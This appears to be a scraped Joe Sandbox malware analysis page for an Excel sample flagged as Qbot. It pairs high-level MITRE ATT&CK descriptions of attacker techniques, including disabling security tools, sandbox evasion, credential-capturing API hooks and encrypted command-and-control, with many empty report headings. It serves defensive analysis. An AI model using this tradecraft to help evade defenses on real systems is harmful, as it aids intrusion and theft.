Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report xls.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Qbot

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Persistence and Installation Behavior:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "xls.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: UserForm2, Stream Size: -1

General

VBA Code

VBA File Name: Module5, Stream Size: 4241

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre